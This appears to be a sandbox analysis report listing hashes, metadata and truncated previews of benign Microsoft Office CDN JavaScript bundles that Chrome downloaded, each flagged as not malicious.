                              MD5:B18C5BFC8C7A4739A4E5C56D7A29BD70
                              SHA1:1C63AFABB3220AAEECAB7BE7F3CBB7059444C947
                              SHA-256:DFD36942CD3F72D0680C3411700390FB2CBF5CAEFFC852D01ADAAB6F1AF75C65
                              SHA-512:7ADA8131F256F17BBA75FAD1DFF1191088375B4A3F6F536AE796E6503E3396EB70BDCB50FA54D2D9A6FD1158AE13475B034FD45EB2042040108503CDD29B9D78
                              Malicious:false
                              Reputation:unknown
                              URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-04-19.005/@ms/stream-bundle/chunks/21021.js
                              Preview:"use strict";(self.webpackChunk_ms_stream_bundle=self.webpackChunk_ms_stream_bundle||[]).push([[21021],{767784:(e,t,n)=>{n.d(t,{PQ:()=>s,Uy:()=>r,gR:()=>o,p4:()=>i,r6:()=>c});var a=n(211111),i="toggleUi",r="togglePreRoll",o="toggleTitle",s="toggleBottomGradient",c=function(e){var t,n,c;return(0,a.Z)({player:{selectors:(t={},t[".".concat(i)]={transition:e?"opacity 300ms ease 0s, visibility 300ms ease 0s":"opacity 1.5s ease 0s, visibility 1.5s ease 0s",opacity:"0 !important",visibility:"hidden"},t[".".concat(r)]={transition:"opacity 0.2s ease 0s",opacity:"0 !important"},t[".".concat(o)]={transition:e?"opacity 300ms ease 0s":"opacity 1.5s ease 0s",opacity:"0 !important"},t[".".concat(s)]={transition:"opacity 0.15s cubic-bezier(0.75, 0.00, 0.75, 0.90) 0.2s",opacity:"0 !important"},t)},playerActive:{selectors:(n={},n[".".concat(i)]={transition:"opacity 0.01s ease 0s, visibility 0.01s ease 0s",opacity:"1 !important",visibility:"visible"},n[".".concat(o)]={transition:"opacity 0.01s ease 0s",o
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:ASCII text, with very long lines (4285)
                              Category:downloaded
                              Size (bytes):6046
                              Entropy (8bit):5.176532718083812
                              Encrypted:false
                              SSDEEP:
                              MD5:F42C14D692B03456CC144B49B623652D
                              SHA1:1814C5D660C87583FABFDA7E0B360AFBC0734EAD
                              SHA-256:D7A233F04F23A8BBFCC69ECB2343BD1A6A42F228688D8BEBC99DABD0235F192E
                              SHA-512:DF486701D4181FE0F21885C94E4C24BBA4FC473F008A8EE1F671139BBF0213BEC10471C0BE74C5F6473D823A7A110814D7242B0B9B68B8FD6610D4A95C3400AC
                              Malicious:false
                              Reputation:unknown
                              URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-04-19.005/listsenterprise/8.js
                              Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[8],{1033:(e,t,n)=>{n.d(t,{a:()=>l,b:()=>u,c:()=>c,d:()=>o});var a=n(59),i=n(439),r=n(75);function o(e){var t="string"==typeof e?(0,i.a)(e):e;return{filters:l(t.where),sorts:s(t.orderBy),groupBy:c(t.groupBy),fieldNames:(0,i.e)(t.viewFields),rowLimit:d(t.rowLimit),associatedContentTypeId:(0,i.d)(t.associatedContentTypeId)}}function s(e){if(e){var t=Array.prototype.slice.call(e.childNodes).map(function(e){return f(e)}).filter(function(e){return!!e});return t.length?t:void 0}}function c(e){if(e){var t=Array.prototype.slice.call(e.childNodes).map(function(e){return f(e)}).filter(function(e){return!!e});if(t.length){var n={isCollapsed:p(e,a.a.collapse,!0),group1:t[0]};return t[1]&&(n.group2=t[1]),n}}}function d(e){if(e&&e.textContent)return{rowLimit:Number(e.textContent),isPerPage:p(e,a.a.paged,!1)}}function l(e,t){if(e&&e.childElementCount){var n=u(e.firstElementChild,t);return n&&n.length?n:void 0}}function u(e,t
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:Unicode text, UTF-8 text, with very long lines (3881)
                              Category:downloaded
                              Size (bytes):8237
                              Entropy (8bit):5.045230521647364
                              Encrypted:false
                              SSDEEP:
                              MD5:E0331613533491384770307050947643
                              SHA1:9C9478EFDFC227EA44C7447F89585B9F3FCF121B
                              SHA-256:652C9228F252BA062B1D80F83B682EC4C82508E93152819CFD14DD0FF9CEB22A
                              SHA-512:17F58009BAC83735CBEF2D12DA68DECAE88467A169CB1661106D26C0EF53E49533E53E2CAD7E229CFD859A75C48B786C815089FB1E5F982C62C882C4EB39714D
                              Malicious:false
                              Reputation:unknown
                              URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-04-19.005/freemiumlistshomewebpack/en-us/initial.resx.js
                              Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([["initial.resx"],{50:e=>{e.exports=JSON.parse('{"b":"Only available when online","a":"{0}. Disabled while offline"}')}.,184:e=>{e.exports=JSON.parse('{"t":"Dark red","u":"Red","v":"Orange","w":"Green","x":"Dark green","y":"Teal","z":"Blue","A":"Navy blue","B":"Blue purple","C":"Dark blue","D":"Lavender","E":"Pink","o":"Rocket","n":"Robot","e":"Bug","a":"Airplane","f":"Calendar","s":"Target","g":"Clipboard","i":"Color palette","l":"Lightbulb","j":"Cube","c":"Beaker","p":"Piggy bank","r":"Playlist","k":"Hospital","b":"Bank","m":"Map pin","h":"Coffee cup","q":"Shopping cart","d":"Birthday cake"}')}.,186:e=>{e.exports=JSON.parse('{"RelativeDateTime_AFewSeconds":"A few seconds ago","RelativeDateTime_AFewSeconds_StartWithLowerCase":"a few seconds ago","RelativeDateTime_AFewSecondsFuture":"In a few seconds","RelativeDateTime_AFewSecondsFuture_StartWithLowerCase":"in a few seconds","RelativeDateTime_AboutAMinuteFuture
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:Unicode text, UTF-8 text, with very long lines (45734)
                              Category:downloaded
                              Size (bytes):50013
                              Entropy (8bit):5.633704950837339
                              Encrypted:false
                              SSDEEP:
                              MD5:59BE03491A41B55B72E59C91BE5A3F90
                              SHA1:CF42A9542741C5A789A46F343C9984C5FB62E82B
                              SHA-256:7E7677F5C642A04C30E01E0ECA708677AD592E30B80DBAECBA4ABE428AC029CE
                              SHA-512:D66FAB612C2EAB4D79E65084B817A412FAC4C9100AFEAE492C61E7235BEB9B5732BB5016C315C20E583351B9A5E0BB07DD1BBC32AE71EF12235504A176EB4A90
                              Malicious:false
                              Reputation:unknown
                              URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-04-19.005/odblightspeedwebpack/245.js
                              Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[245],{1860:function(e,t,n){n.r(t),n.d(t,{initializeIcons:function(){return E}});var a=n(1781),i=n("fui.util_150");function r(e,t){void 0===e&&(e="");var n={style:{MozOsxFontSmoothing:"grayscale",WebkitFontSmoothing:"antialiased",fontStyle:"normal",fontWeight:"normal",speak:"none"},fontFace:{fontFamily:'"FabricMDL2Icons-0"',src:"url('".concat(e,"odsp-next-icons-0-433a26c6.woff') format('woff')")},icons:{DecreaseIndentLegacy:".",IncreaseIndentLegacy:".",SizeLegacy:".",PageLink:".",DatabaseSource:".",CommentSolid:".",ChangeEntitlements:".",Installation:".",WebAppBuilderModule:".",WebAppBuilderFragment:".",WebAppBuilderSlot:".",BullseyeTargetEdit:".",WebAppBuilderFragmentCreate:".",PageData:".",PageHeaderEdit:".",ProductList:".",UnpublishContent:".",DependencyAdd:".",DependencyRemove:".",EntitlementPolicy:".",EntitlementRedemption:".",SchoolDataSyncLogo:".",BugWarning:"
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:ASCII text, with very long lines (5159)
                              Category:downloaded
                              Size (bytes):11655
                              Entropy (8bit):5.334020776715153
                              Encrypted:false
                              SSDEEP:
                              MD5:CAF4942A83A5245D1B4526BE0AAE7AB5
                              SHA1:939C0FE2AF3144A1D3E9A860AB26326E23ADB99C
                              SHA-256:0961963BB7F9BA0ACC980B140F9B17A2256EB67BAD7CCF64F8CD2184093E0159
                              SHA-512:28EA0732949E9FAB1E1FB081CEA319D2DAC59301082E69228C810C294000B8B7CA2071CC8735882B0F7B680438C0E282B97055BD9200887A6FE59016216FA14A
                              Malicious:false
                              Reputation:unknown
                              URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-04-19.005/@ms/stream-bundle/chunks/11111.js
                              Preview:"use strict";(self.webpackChunk_ms_stream_bundle=self.webpackChunk_ms_stream_bundle||[]).push([[11111],{154591:(e,t,n)=>{function a(e){r!==e&&(r=e)}function i(){return void 0===r&&(r="undefined"!=typeof document&&!!document.documentElement&&"rtl"===document.documentElement.getAttribute("dir")),r}var r;function o(){return{rtl:i()}}n.d(t,{Lo:()=>o,mk:()=>a}),r=i()}.,200408:(e,t,n)=>{n.d(t,{Y:()=>s});var a,i=n(295610),r="undefined"!=typeof navigator&&/rv:11.0/.test(navigator.userAgent),o={};try{o=window||{}}catch(e){}var s=function(){function e(e,t){var n,a,r,o,s,c;this._rules=[],this._preservedRules=[],this._counter=0,this._keyToClassName={},this._onInsertRuleCallbacks=[],this._onResetCallbacks=[],this._classNameToArgs={},this._config=(0,i.__assign)({injectionMode:"undefined"==typeof document?0:1,defaultPrefix:"css",namespace:void 0,cspSettings:void 0},e),this._classNameToArgs=null!==(n=null==t?void 0:t.classNameToArgs)&&void 0!==n?n:this._classNameToArgs,this._counter=null!==(a=null==t?
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:Unicode text, UTF-8 text, with very long lines (38356)
                              Category:downloaded
                              Size (bytes):39199
                              Entropy (8bit):5.352150180748478
                              Encrypted:false
                              SSDEEP:
                              MD5:84ADDF41A0D7D55C0E22C24DC8E083E7
                              SHA1:E7B2A5CFADFFCC38279F38902F2F7A056BD9B962
                              SHA-256:1C7895F00BF6DBCF91F95FFEA90B5E6A685C7379CE1908EA242BB98432EEFFBA
                              SHA-512:4D28158E4BA1AE0354CC470D9A59081F7F38490B6131C38599E0B112B490F275DD6A59A3EDED1652E7D6648B45D3AEBAB9F86FABA604DF926F641778A86CCC1A
                              Malicious:false
                              Reputation:unknown
                              URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-04-19.005/metaosfilebrowser/31.js
                              Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[31],{1158:(e,t,n)=>{n.d(t,{a:()=>i});var a=n("knockout-lib");const i=function(){function e(){}return e.init=function(e,t,n,i,r){var o=a.utils.unwrapObservable(t()),s=o&&o.activate||o;s&&s.call(r.$data,e)},e.supportsVirtualElements=!0,e}()}.,735:(e,t,n)=>{n.d(t,{a:()=>i});var a=n("knockout-lib");const i=function(){function e(){}return e.update=function(e,t){var n=a.unwrap(t());e.style.visibility=n?"inherit":"hidden"},e}()}.,2022:(e,t,n)=>{n.r(t),n.d(t,{resourceKey:()=>$});var a=n("fui.util_150");(0,a.pZ)([{rawString:"@keyframes commandBarBoxShadowAnimation{0%{box-shadow:none;background-color:transparent}100%{background-color:"},{theme:"listBackground",defaultValue:"#fff"},{rawString:";box-shadow:0 3.2px 7.2px 0 rgba(0,0,0,.132),0 .6px 1.8px 0 rgba(0,0,0,.108)}}@keyframes commandBarDividerAnimation{0%{opacity:1}100%{opacity:0}}.lg .od-Search-overlay .od-SearchResults,.xlg .od-Search-overlay .od-SearchResults,.x
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:ASCII text, with very long lines (3600)
                              Category:downloaded
                              Size (bytes):9550
                              Entropy (8bit):5.170164102026555
                              Encrypted:false
                              SSDEEP:
                              MD5:15856F552A6FE4AC416EF67EA115B681
                              SHA1:6BDE4A609447508893316AF71AFFF741948A7699
                              SHA-256:144E69399ADC39B3C787E46F92559DF4D9119A4F28F955A97DF002BFE59B8B30
                              SHA-512:31EF13851CD69E5F74952C6F7800F038ED38B0ABEC2A667F99D3C846AD91DA035125A3EE3B8CA37AC10EB8120AFFBAFE2F7432A64ACD7A3FB09A5F318CE0F7AE
                              Malicious:false
                              Reputation:unknown
                              URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-04-19.005/odblightspeedwebpack/0.js
                              Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[0,176],{2088:function(e,t,n){n.d(t,{a:function(){return m},b:function(){return l},d:function(){return f},e:function(){return u}});var a=n("tslib_102"),i=n("odsp.util_578"),r=n(112),o=n(111),s=n(921),c=n(154),d="@ms/odsp-shared/lib/base/BaseModel",l=new i.qT({name:"".concat(d,".asyncType"),factory:new i.bF(o.a)}),u=new i.qT({name:"".concat(d,".observablesFactoryType"),factory:new i.ap(s.a,{asyncType:l.optional})}),f=new i.qT({name:"".concat(d,".eventGroupType"),factory:new i.bF(r.b)}),p=new i.qT({name:"".concat(d,".errorHandler")}),m=function(e){function t(t,n){void 0===t&&(t={}),void 0===n&&(n={});var a=e.call(this,t,n)||this,i=t.id,r=void 0===i?"":i;return a.id=r,a._BaseModel_dependencies=n,a}return(0,a.XJ)(t,e),Object.defineProperty(t.prototype,"async",{get:function(){return this._BaseModel_getAsync()},enumerable:!1,configurable:!0}),Object.defineProperty(t.prototype,"events",{get:function(){return this._Ba
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:ASCII text, with very long lines (49568)
                              Category:downloaded
                              Size (bytes):182276
                              Entropy (8bit):5.27174559039339
                              Encrypted:false
                              SSDEEP:
                              MD5:17597B720FADDE4026BB5FF861256ED5
                              SHA1:810D890CE7DBD76757BFB1F5029534100257C4F1
                              SHA-256:E55B5326B75AD74ED66F5F2F1533158D3CBC66D8B5463B8E12BF1876C4A7B676
                              SHA-512:E0B0762B3AA9629F0842FFF5BF5C9CAA11A546A2E67CDB09D21471BC6A33B5EBDFBCBA05FC93D52ADCE2ADBD59D4004017AE37DF5899BF9F65BE5A81DED7DFD6
                              Malicious:false
                              Reputation:unknown
                              URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-04-19.005/listsenterprise/54.js
                              Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[54,78],{900:(e,t,n)=>{n.d(t,{a:()=>i});var a=n(842);function i(e){return(0,a.a)(e())}}.,893:(e,t,n)=>{n.d(t,{a:()=>c,b:()=>s});var a=n(830),i=n(324),r=n(829),o=new a.a("operation",{operationTypeId:i.b,keyFacetId:i.b});function s(e){var t=e.operationTypeFacet,n=e.keyFacet;return o.serialize({operationTypeId:t.id,keyFacetId:n.id})}function c(e){var t=o.deserialize(e),n=t.keyFacetId,a=t.operationTypeId;return{keyFacet:r.a.get(n),operationTypeFacet:r.a.get(a)}}}.,894:(e,t,n)=>{n.d(t,{a:()=>l,b:()=>d,c:()=>c});var a=n("tslib_102"),i=n(829),r=n(893),o=n("odsp.util_578"),s=n(895),c=new i.a("noRegisteredHandlerError");function d(e){var t=e.operationTypeFacet,n=e.keyFacet;return new s.a({message:"There is no operation handler registered for operation type '".concat(t.id,"' of key facet '").concat(n.id,"'."),isExpected:!0,facets:(0,a.W_)({},c.pack((0,r.b)({operationTypeFacet:t,keyFacet:n})))})}var l=function(e){functio
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:ASCII text, with very long lines (6190)
                              Category:downloaded
                              Size (bytes):25852
                              Entropy (8bit):5.218002668883261
                              Encrypted:false
                              SSDEEP:
                              MD5:1E2289A1AAC2281012BC306FAB24A5E5
                              SHA1:A3A1D83163CEA25F6AF36D65A33ED426A9477A11
                              SHA-256:EC641D0C5EA5D7235A6E6AF338E144148A96E8FE56FC87E56475586627139816
                              SHA-512:3CF7BDAE02F48216E76ED8136D1C1C56EE4F9AEEEAE118CC63E9F3788538712857A72DECCEFF14B3D798FC3DB8A2395732125A5B8FEFCAF58CA123D9887E88D9
                              Malicious:false
                              Reputation:unknown
                              URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-04-19.005/odblightspeedwebpack/59.js
                              Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[59],{2607:function(e,t,n){n.d(t,{a:function(){return i},b:function(){return r},c:function(){return a}});var a={none:0,allow:1,allowWithJustification:2},i={none:0,falsePositiveReported:1,overridden:2,falsePositiveReportedAndOverridden:3},r={override:0,reportFalsePositive:1}}.,2436:function(e,t){t.a={controls:1,quota:2,pushChannel:3,firstRun:4}}.,2181:function(e,t,n){n.r(t),n.d(t,{resourceKey:function(){return o}});var a=n(2088),i=n("odsp.util_578"),r=n(944),o=new i.qT({name:"".concat("IsDetailsPaneExpanded",".isDetailsPaneExpanded"),factory:{dependencies:{detailsPaneId:r.a,observablesFactoryType:a.e},create:function(e){var t=new(0,e.observablesFactoryType)({});return{instance:t.create(!1),disposable:t}}}})}.,2141:function(e,t,n){var a;n.d(t,{a:function(){return a}}),function(e){e[e.notConfigured=0]="notConfigured",e[e.visible=1]="visible",e[e.notVisible=2]="notVisible"}(a||(a={}))}.,2188:function(e,t,n){n.d(t,
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:ASCII text, with very long lines (4887)
                              Category:downloaded
                              Size (bytes):47040
                              Entropy (8bit):5.370830615175695
                              Encrypted:false
                              SSDEEP:
                              MD5:C414D9CE9B1CA4DCB7B767EA16E58CB9
                              SHA1:E9A0C7E453B9EB0FDF2652B569966917D53E61FA
                              SHA-256:20AF54578C6E570D758F8574832671DB15BAB7EC43A7955D56401C0880B84355
                              SHA-512:D7F84B5634D0CABB0C2705E688603EC2A4F05EA9E24B419D5D1BE64C29BAA7F64F5F954EB28A94DB5DEAED310834422C22F08A3C120AE8C2C947C4DF416079F1
                              Malicious:false
                              Reputation:unknown
                              URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-04-19.005/@ms/stream-bundle/chunks/19144.js
                              Preview:"use strict";(self.webpackChunk_ms_stream_bundle=self.webpackChunk_ms_stream_bundle||[]).push([[19144],{594664:(e,t,n)=>{n.d(t,{t:()=>i});var a=n(746381);function i(e,t,n){void 0===n&&(n=!0);var i=!1;if(e&&t)if(n)if(e===t)i=!0;else for(i=!1;t;){var r=(0,a.G)(t);if(r===e){i=!0;break}t=r}else e.contains&&(i=e.contains(t));return i}}.,441736:(e,t,n)=>{n.d(t,{X:()=>i});var a=n(746381);function i(e,t,n){return null!=n||(n=document),e&&e!==n.body?t(e)?e:i((0,a.G)(e),t):null}}.,746381:(e,t,n)=>{n.d(t,{G:()=>i});var a=n(735036);function i(e,t){return void 0===t&&(t=!0),e&&(t&&function(e){var t;return e&&(0,a.r)(e)&&(t=e._virtual.parent),t}(e)||e.parentNode&&e.parentNode)}}.,735036:(e,t,n)=>{function a(e){return e&&!!e._virtual}n.d(t,{r:()=>a})}.,522673:(e,t,n)=>{n.d(t,{U:()=>i,Y:()=>a});var a="data-portal-element";function i(e){e.setAttribute(a,"true")}}.,641016:(e,t,n)=>{n.d(t,{r:()=>r});var a=n(124725),i=n(408156);function r(){var e=i.useRef();return e.current||(e.current=new a.e),i.useEffec
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:ASCII text, with very long lines (4139)
                              Category:downloaded
                              Size (bytes):20509
                              Entropy (8bit):5.193260928637385
                              Encrypted:false
                              SSDEEP:
                              MD5:193439E5B7E9F7D0DB934B2DD4E3023C
                              SHA1:E97ECE964E811DDCC7E7CFABBE3F4A9C3DC2C3CB
                              SHA-256:D8BB2CFED40189E4954866DFD5E272B9AFB44CABC4D21BC0A009C4B430C001A5
                              SHA-512:ACAC2ADB28EC3D1642F4EC7B51BC9C44A931331083DCE26489CE998FD3287E2D66B4B3A19304C288551445FB4678AE3ABCA1F19F4F2211BC364DFF2D7B64D461
                              Malicious:false
                              Reputation:unknown
                              URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-04-19.005/odblightspeedwebpack/18.js
                              Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[18],{2261:function(e,t,n){n.d(t,{a:function(){return o}});var a=n(169),i=n(26),r=n(14),o=(n(89),(0,a.a)({eventName:"Action,Qos,",shortEventName:"Action"},{pageType:i.a.String,queryType:i.a.String,logStartEnd:i.a.Boolean},r.a))}.,2509:function(e,t,n){var a=n(23),i=n(115),r=function(){function e(e){this.concurrency=e||1,this._running=0,this._queue=[],this._promiseComplete=this._promiseComplete.bind(this)}return e.prototype.enqueue=function(e){var t;if(this._running<this.concurrency)this._running++,(t=e()).then(this._promiseComplete,this._promiseComplete);else{var n={callback:e,signal:null,canceled:!1,result:null};n.signal=new i.a(function(){n.canceled=!0,a.c.is(n.result)&&n.result.cancel()}),this._queue.push(n),t=n.signal.getPromise()}return a.c.resolve(t)},e.prototype._promiseComplete=function(){var e=this;if(this._running--,this._running<this.concurrency&&this._queue.length){for(var t=this._queue.shift();t&&t
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:Unicode text, UTF-8 text, with very long lines (12746)
                              Category:downloaded
                              Size (bytes):570298
                              Entropy (8bit):5.082189619284254
                              Encrypted:false
                              SSDEEP:
                              MD5:F6C941AC514579DC6CD9DFD5DB3B4649
                              SHA1:65A5069163E61657EFB60B91DD64CC5B789C7B0D
                              SHA-256:28C6A9838FB669EDBA5C02F7ACE84A8856A06D9EDB075B377899154A3968B253
                              SHA-512:24553361B5638DB07EBD78087B033D348DBF15A9C2E84305AA0DDBD6B3B20D1A65DC4F5ADEE010D9377BF545984196911C4056AD376C9EC0EE778D75CC386583
                              Malicious:false
                              Reputation:unknown
                              URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-04-19.005/file-browser-odb-teams/fr/ondemand.resx.js
                              Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([["ondemand.resx"],{6474:e=>{e.exports=JSON.parse('{"a":"EnvironmentType is invalid","b":"Invalid GUID string: \\u0022{0}\\u0022","f":"The value for \\u0022{0}\\u0022 is false","g":"The value for \\u0022{0}\\u0022 must not be null","h":"The value for \\u0022{0}\\u0022 must not be undefined","e":"The value for \\u0022{0}\\u0022 must not be an empty string","d":"The \\u0022{0}\\u0022 object cannot be used because it has been disposed.","c":"Invalid version string: \\u0022{0}\\u0022","j":"Cannot consume services because the scope is not finished yet","k":"Cannot consume services during ServiceScope autocreation","i":"The ServiceScope is already finished","l":"Cannot register service because the scope is already finished","m":"The service key \\u0022{0}\\u0022 has already been registered in this scope","o":"INNERERROR:","n":"CALLSTACK:","p":"LOGPROPERTIES:"}')}.,7214:e=>{e.exports=JSON.parse('{"a":"A source with id
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:ASCII text, with very long lines (11405)
                              Category:downloaded
                              Size (bytes):11410
                              Entropy (8bit):5.458251416096253
                              Encrypted:false
                              SSDEEP:
                              MD5:8FEB2334D69283E0891318C1CAF14716
                              SHA1:4B7415042FDDF01FEF5FB86BB5F8E88885748F50
                              SHA-256:A8015022640B7EA4DE48027CFEB4C75F2DB212258E5F5B447F9B74B81909495D
                              SHA-512:1AF7F2BE7A3E3CC1A0C82F7FA8554AEEA910CFB0D0AED2DE3C82A0C3D87C8FFDE6EF21D0E16830824EB9A76718834CCD1D73DC7A04F842BF8514D8FCC3B82A00
                              Malicious:false
                              Reputation:unknown
                              URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-04-19.005/listsenterprise/259.js
                              Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[259],{1636:(e,t,n)=>{n.r(t),n.d(t,{default:()=>y});var a=n("tslib_102"),i=n("react-lib"),r=n("fui.lco_35"),o=n("fui.lcoms_307"),s=n("fui.core_238"),c=n(2393);(0,n("fui.util_150").pZ)([{rawString:".container_5f4c70fd{display:flex;flex-flow:column;width:412px;overflow-y:hidden}.thumbsUpContainer_5f4c70fd{display:flex;flex-flow:column;width:412px;overflow-y:hidden;min-height:0}.innerContainer_5f4c70fd{display:flex;flex-flow:column;overflow-y:hidden}.header_5f4c70fd{font-size:21px;font-weight:100;display:flex;align-items:center;font-weight:600;padding:16px 12px 20px 24px}[dir=rtl] .header_5f4c70fd{padding:16px 24px 20px 12px}.iconButtonStyle_5f4c70fd{margin-top:4px}[dir=ltr] .iconButtonStyle_5f4c70fd{margin-left:auto}[dir=rtl] .iconButtonStyle_5f4c70fd{margin-right:auto}[dir=ltr] .iconButtonStyle_5f4c70fd{margin-right:2px}[dir=rtl] .iconButtonStyle_5f4c70fd{margin-left:2px}.body_5f4c70fd{flex:4 4 auto;padding:0 2
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:ASCII text, with very long lines (43463)
                              Category:downloaded
                              Size (bytes):56766
                              Entropy (8bit):5.495158116384433
                              Encrypted:false
                              SSDEEP:
                              MD5:4ABA70E02C548D989FF3785DF138F440
                              SHA1:FD25C0A86DC4E1DCA3C084228FE04D856D4B210E
                              SHA-256:8E5B02DFD6F036254B68BE0EB5A98F245EED94BE7E27E5F95EE7652DC437E279
                              SHA-512:250A532B0346817AA5A5964C6C50F2477FCDA5A58FE74DAE566B23196AADD6B930781C1C516B99670CCA9DC50716CA81E6F62FDEC0D010CC3B00CC9E69A31864
                              Malicious:false
                              Reputation:unknown
                              URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-04-19.005/odblightspeedwebpack/13.js
                              Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[13],{6078:function(e,t,n){var a;n.d(t,{a:function(){return a}}),function(e){e.None="None",e.FilterInViewDef="FilterInViewDef",e.MultiSortsInViewDef="MultiSortsInViewDef",e.SortFieldInViewDef="SortFieldInViewDef",e.FilterInQueryParam="FilterInQueryParam",e.SortFieldInQueryParam="SortFieldInQueryParam",e.GroupFieldInQueryParam="GroupFieldInQueryParam",e.NoPermission="NoPermission",e.Unknown="Unknown"}(a||(a={}))}.,4485:function(e,t,n){n.r(t),n.d(t,{getServerData:function(){return S},getServerDataWithPrefetch:function(){return y}});var a=n("tslib_102"),i=n(155),r=n(1224),o=n(1291),s=n(35),c=n(120),d=n(6),l=n(43),u=n(1289),f=n(67),p=n(1225),m=n(4486),_=n(76);function h(e,t){var n=e.HttpRoot||new _.a(t).authority,i=new _.a(n).path,r=(e.listUrlDir||"").slice(0,i.length)===i;return(0,a.W_)((0,a.W_)({},e),{listUrlDir:r?e.listUrlDir:"".concat(i).concat(e.listUrlDir)})}var b=n(66),g=n("odsp.util_578"),v={ODB:60709};fun
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:ASCII text, with very long lines (1872)
                              Category:downloaded
                              Size (bytes):1877
                              Entropy (8bit):4.743238518525109
                              Encrypted:false
                              SSDEEP:
                              MD5:40662F6082B8596D6C3D1E4CE1E1FD75
                              SHA1:BA48F1CD2CD3FBF7CA15B2930B3E91DECA4A120E
                              SHA-256:2399F28F6F46EF66687DFC12F710707FD4733BC96C17A7B3F11E5A9284521AD8
                              SHA-512:A785A41051FAACDCA14FFDF7249C6DF0F3641F7C39476E97C4322F2FC2E227293C8212ADF811D27E3E46712E2748EBB187ED145B0DCBC4C829FCB1FA8F5C1F95
                              Malicious:false
                              Reputation:unknown
                              URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-04-19.005/file-browser-spo-teams-lists/en-gb/deferred.resx.js
                              Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([["deferred.resx"],{7763:e=>{e.exports=JSON.parse('{"introPageHeaderText":"Add Microsoft Teams","selectPageHeaderText":"Pin resources as tabs in Teams","introPageDescription1":"Bring resources from this site into Teams for real-time collaboration all in one place. ","introPageSecondHeader":"Teams makes it easier to:","introPagePoint1":"Chat with your colleagues","introPagePoint2":"Co-ordinate online meetings with partners","introPagePoint3":"Work together on shared content","selectPageDescription":"Add pages, lists and document libraries as tabs in Teams to make shared resources readily available for collaborators. Once in Teams, resources in tabs can be added, removed or reordered.","continueButtonText":"Continue","addTeamButtonText":"Add Teams","cancelButtonText":"Cancel","recommended":"Recommended","pages":"Pages","lists":"Lists","doclibs":"Document Libraries","creatingTeam":"Creating your Team","addResource
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:ASCII text, with very long lines (1715)
                              Category:downloaded
                              Size (bytes):4887
                              Entropy (8bit):5.167944728965936
                              Encrypted:false
                              SSDEEP:
                              MD5:1C01925096278EACD82DAFA47057D03A
                              SHA1:3025E22E0BF463C538DDA888A280CE5B288FB336
                              SHA-256:0264A4460C34BCFA6355DB04D15369FE4A8E19D5C198A9693E6C63D6C40E53DA
                              SHA-512:F219F63AEC65FF1156801AD47FD8AFAC8ABC142BF6F81F4CF39B63B939CF3916E901702ABD638E60DC382B39BE9EB7AF289247C084E31A85B3033EF3C1BA3D05
                              Malicious:false
                              Reputation:unknown
                              URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-04-19.005/odblightspeedwebpack/604.js
                              Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[604],{2205:function(e,t,n){n.d(t,{b:function(){return d}});var a=n("tslib_102"),i=n(23),r=n("odsp.util_578"),o=n(2088),s=n(242),c=function(e){function t(t,n){void 0===n&&(n={});var a=e.call(this,t,n)||this;return a._getModule=t.getModule,a._path=t.path,a._getExecutorParams=t.getExecutorParams,r.HW.isActivated("9DB5106C-820A-4714-B0C1-1005523DFE8F","07/09/2021","Removes usage of BundeLoader from ExecutorAction to solve race conditions in BundleQueue")&&(a._bundleLoader=a.resources.consume(s.a),a._bundleLoader.queueLoad(a._path,a._getModule).done()),a}return(0,a.XJ)(t,e),t.prototype.execute=function(e,t){var n=this;return this._path?this._loadExecutorType().then(function(a){return"function"!=typeof a?i.c.wrapError(new Error("Cannot create action from ".concat(a,": ").concat(n._path))):i.c.as(n._getExecutorParams()).then(function(r){var o=new(n.resources.injected(a))(r);return i.c.as(o.execute(e,t))})}):i.c.wrap
